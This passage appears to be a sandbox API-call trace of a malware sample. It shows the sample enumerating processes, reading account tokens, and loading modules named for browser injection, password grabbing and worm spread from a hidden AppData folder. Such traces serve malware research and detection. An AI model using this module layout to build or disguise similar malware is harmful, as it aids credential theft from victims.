	[0256.489] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.490] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0256.490] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0256.491] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0256.491] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.492] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0256.492] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.493] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0256.493] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.494] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0256.494] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0256.494] lstrcmpW (lpString1="explorer.exe", lpString2="cmd.exe") returned 1
	[0256.494] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0256.495] lstrcmpW (lpString1="explorer.exe", lpString2="conhost.exe") returned 1
	[0256.495] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0256.496] lstrcmpW (lpString1="explorer.exe", lpString2="net.exe") returned -1
	[0256.496] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0256.497] CloseHandle (hObject=0x700) returned 1
	[0256.497] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa20
	[0256.497] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa50
	[0256.497] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2807678
	[0256.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x700
	[0256.497] OpenProcessToken (in: ProcessHandle=0x700, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x668) returned 1
	[0256.497] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0256.497] GetLastError () returned 0x7a
	[0256.497] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6618
	[0256.497] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x22a6618, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x22a6618, ReturnLength=0x128c98) returned 1
	[0256.497] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a6620*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0256.498] CloseHandle (hObject=0x668) returned 1
	[0256.498] CloseHandle (hObject=0x700) returned 1
	[0256.498] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0490
	[0256.498] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa20) returned 1
	[0256.498] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2600
	[0256.498] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa20
	[0256.498] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2807780
	[0256.498] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0256.498] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0256.498] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0256.498] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0256.498] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0256.498] lstrcmpiW (lpString1="wormDll32", lpString2="pwgrab32") returned 1
	[0256.498] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2600) returned 1
	[0256.498] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2807780) returned 1
	[0256.498] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa20) returned 1
	[0256.498] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa50) returned 1
	[0256.498] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225eb8
	[0256.498] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0256.499] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0256.499] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0256.499] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0256.499] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0256.499] GetExitCodeThread (in: hThread=0x6d4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0256.499] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225eb8) returned 1
	[0256.499] Sleep (dwMilliseconds=0x4e20) 
	[0256.543] Sleep (dwMilliseconds=0x4e20) 
	[0256.590] Sleep (dwMilliseconds=0x4e20) 
	[0256.610] Sleep (dwMilliseconds=0x4e20) 
	[0256.621] Sleep (dwMilliseconds=0x4e20) 
	[0256.637] Sleep (dwMilliseconds=0x4e20) 
	[0256.653] Sleep (dwMilliseconds=0x4e20) 
	[0256.710] Sleep (dwMilliseconds=0x4e20) 
	[0256.746] Sleep (dwMilliseconds=0x4e20) 
	[0256.793] Sleep (dwMilliseconds=0x4e20) 
	[0256.840] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x80b35080, dwHighDateTime=0x1d50a6a)) 
	[0256.840] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0256.840] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0256.840] GetFileTime (in: hFile=0x66c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x7cece240, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.840] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x80b35080, dwHighDateTime=0x1d50a6a)) 
	[0256.840] GetFileTime (in: hFile=0x66c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x7e96f860, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.840] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x80b35080, dwHighDateTime=0x1d50a6a)) 
	[0256.841] GetFileTime (in: hFile=0x66c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.841] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x80b35080, dwHighDateTime=0x1d50a6a)) 
	[0256.841] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0256.841] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0256.841] GetFileTime (in: hFile=0x66c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.841] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x80b35080, dwHighDateTime=0x1d50a6a)) 
	[0256.841] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0256.841] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0256.841] GetFileTime (in: hFile=0x66c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.841] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x80b35080, dwHighDateTime=0x1d50a6a)) 
	[0256.842] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0256.842] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0256.842] GetFileTime (in: hFile=0x66c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.842] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x80b35080, dwHighDateTime=0x1d50a6a)) 
	[0256.842] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0256.842] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0256.842] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0256.842] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0256.842] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b6fc0
	[0256.842] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0256.842] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0256.842] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1678
	[0256.842] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d4f0
	[0256.842] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0256.842] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0256.842] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1678, Size=0x10) returned 0x27e1570
	[0256.842] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21dfb8
	[0256.842] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0256.842] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0256.842] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1570, Size=0x10) returned 0x27e1678
	[0256.842] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21db68
	[0256.843] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0256.843] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0256.843] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1678, Size=0x10) returned 0x27e1570
	[0256.843] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0256.843] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0256.843] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0256.843] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1570, Size=0x20) returned 0x2737e80
	[0256.843] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21ca28
	[0256.843] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0256.843] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2737e80, Size=0x20) returned 0x2737f48
	[0256.843] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d0a0
	[0256.843] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 1
	[0256.843] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2737f48, Size=0x20) returned 0x2737e80
	[0256.843] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21cc50
	[0256.843] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 0
	[0256.843] GetLastError () returned 0x12
	[0256.843] FindClose (in: hFindFile=0x22b6fc0 | out: hFindFile=0x22b6fc0) returned 1
	[0256.843] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0256.843] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21ce78
	[0256.843] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x21ce78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0256.843] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0256.843] GetFileTime (in: hFile=0x66c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
